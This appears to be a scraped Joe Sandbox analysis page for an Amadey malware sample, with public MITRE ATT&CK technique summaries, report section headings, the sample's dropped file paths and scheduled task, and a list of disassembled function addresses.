Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 0053BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 0053E440 Relevance: 16.0, Strings: 12, Instructions: 1000
COMMON

Function 0054D312 Relevance: 2.7, Strings: 2, Instructions: 172
COMMON

Function 00535DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00537D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00566E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 0056AF0B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Function 00566C99 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Function 0056B515 Relevance: 3.0, APIs: 2, Instructions: 19
fileCOMMON

Function 005382B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00566F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON